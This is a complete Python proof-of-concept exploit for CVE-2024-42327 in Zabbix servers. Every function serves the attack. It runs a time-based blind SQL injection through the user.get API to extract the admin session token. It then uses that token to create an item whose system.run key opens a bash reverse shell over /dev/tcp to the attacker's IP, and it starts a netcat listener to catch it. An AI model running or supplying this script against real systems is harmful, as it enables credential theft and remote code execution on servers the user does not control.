#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This script is used to exploit CVE-2024-42327 affecting Zabbix servers to leak the admin API authentication token and create an item to achieve a reverse shell.
"""
# Imports
from concurrent.futures import ThreadPoolExecutor
from threading import Timer
import argparse
import netifaces
import os
import requests
import string
import sys
import urllib.parse
# Disable SSL self-signed certificate warnings
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# Constants
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
ENDC = "\033[0m"
ENCODING = "UTF-8"
def zabbix_authenticate():
"""Authenticate the user and retrieve the API token."""
payload = {"jsonrpc": "2.0", "method": "user.login", "params": {"username": args.username, "password": args.password}, "id": 1}
r = requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False)
if r.status_code == 200:
try:
response_json = r.json()
auth_token = response_json.get("result")
if auth_token:
print(f"[+] Login successful! {args.username} API auth token: {auth_token}")
return auth_token
else:
print(f"{RED}[-] Login failed. Response: {response_json}{ENDC}")
exit()
except Exception as e:
print(f"{RED}[-] Error: {str(e)}{ENDC}")
exit()
else:
print(f"{RED}[-] HTTP request failed with status code {r.status_code}{ENDC}")
exit()
def send_injection(auth_token, position, char):
"""Send an SQL injection payload and measure the response time."""
payload = {
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"output": ["userid", "username"],
"selectRole": [
"roleid",
f"name AND (SELECT * FROM (SELECT(SLEEP({args.sleep_time} - "
f"(IF(ORD(MID((SELECT sessionid FROM zabbix.sessions "
f"WHERE userid=1 and status=0 LIMIT {args.row},1), "
f"{position}, 1))={ord(char)}, 0, {args.sleep_time})))))BEEF)",
],
"editable": 1,
},
"auth": auth_token,
"id": 1,
}
r = requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False)
response_time = r.elapsed.total_seconds()
return char, response_time
def extract_api_token_parallel(auth_token, position, charset=string.printable):
"""Extract the API token (multi-threaded)."""
with ThreadPoolExecutor(max_workers=args.threads) as executor:
futures = {executor.submit(send_injection, auth_token, position, char): char for char in charset}
for future in futures:
char, response_time = future.result()
if args.sleep_time < response_time < args.sleep_time + 0.5:
return char
return None
def get_host_ids(api_token_admin):
"""Retrieve current host IDs and their associated interface IDs."""
payload = {"jsonrpc": "2.0", "method": "host.get", "params": {"output": ["hostid", "host"], "selectInterfaces": ["interfaceid"]}, "auth": api_token_admin, "id": 1}
response = requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False)
if response.status_code == 200:
try:
response_json = response.json()
print(f"[*] host.get response: {response_json}")
result = response_json.get("result", [])
if result:
host_id = result[0]["hostid"]
interface_id = result[0]["interfaces"][0]["interfaceid"]
return host_id, interface_id
else:
print(f"{RED}[-] No hosts found in the response.{ENDC}")
return None, None
except Exception as e:
print(f"{RED}[-] Error parsing response: {str(e)}{ENDC}")
return None, None
else:
print(f"{RED}[-] Failed to retrieve host IDs. HTTP status code: {response.status_code}{ENDC}")
return None, None
def send_reverse_shell_request(api_token_admin, host_id, interface_id):
"""Create an item with a reverse shell payload."""
payload = {
"jsonrpc": "2.0",
"method": "item.create",
"params": {
"name": "rce",
"key_": f'system.run[bash -c "bash -i >& /dev/tcp/{args.listen_ip}/{args.listen_port} 0>&1"]',
"delay": 1,
"hostid": host_id,
"type": 0,
"value_type": 1,
"interfaceid": interface_id,
},
"auth": api_token_admin,
"id": 1,
}
try:
requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False)
except requests.exceptions.Timeout:
pass # Ignore timeout error
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser(description="POC for CVE-2024-42327 (Zabbix admin API token leak)")
parser.add_argument("-t", "--url", help="Zabbix Target URL", required=True)
parser.add_argument("-u", "--username", help="Zabbix username", required=True)
parser.add_argument("-p", "--password", help="Zabbix password", required=True)
parser.add_argument("--listen-ip", help="Listening IP / Interface", default="tun0")
parser.add_argument("--listen-port", type=int, help="Listening Port", default=4444)
parser.add_argument("--threads", type=int, help="Threads", default=10)
parser.add_argument("--sleep-time", type=int, help="Sleep time", default=1)
parser.add_argument("--row", type=int, help="Row index", default=0)
parser.add_argument("--length", type=int, help="Max length", default=32)
parser.add_argument(
"-a",
"--useragent",
type=str,
required=False,
help="User agent to use when sending requests",
default="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36",
)
parser.add_argument("-x", "--proxy", type=str, required=False, help="HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)")
parser.add_argument("-v", "--verbose", action="store_true", required=False, help="Verbosity enabled - additional output flag")
args = parser.parse_args()
# Input-checking
if not args.url.startswith("http://") and not args.url.startswith("https://"):
args.url = "http://" + args.url
args.url = urllib.parse.urlparse(args.url).geturl().strip("/").replace("api_jsonrpc.php", "") + "/api_jsonrpc.php"
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
else:
proxies = {}
headers = {"User-Agent": args.useragent, "Content-Type": "application/json"}
if args.listen_ip.count(".") != 3:
try:
args.listen_ip = netifaces.ifaddresses(args.listen_ip)[netifaces.AF_INET][0]["addr"]
except:
print(f"{RED}[-] Invalid interface/ip {args.listen_ip}{ENDC}")
exit()
print("[*] Authenticating ...")
api_token = zabbix_authenticate()
print("[*] Starting data extraction ...")
api_token_admin = ""
for position in range(len(api_token_admin) + 1, args.length + 1):
for _ in range(1, 3):
char = extract_api_token_parallel(api_token, position)
if char and extract_api_token_parallel(api_token, position, char):
api_token_admin += char
sys.stdout.write(f"\r[*] Extracting admin API auth token: {api_token_admin}")
sys.stdout.flush()
break
print("\n[*] Getting host IDs ...")
host_id, interface_id = get_host_ids(api_token_admin)
if host_id and interface_id:
print("[*] Starting listener and sending reverse shelll ...")
t = Timer(
interval=1,
function=send_reverse_shell_request,
args=(
api_token_admin,
host_id,
interface_id,
),
)
t.start()
os.system(f"nc -lnvp {args.listen_port}")
else:
print(f"{RED}[-] Failed to retrieve host or interface ID.{ENDC}")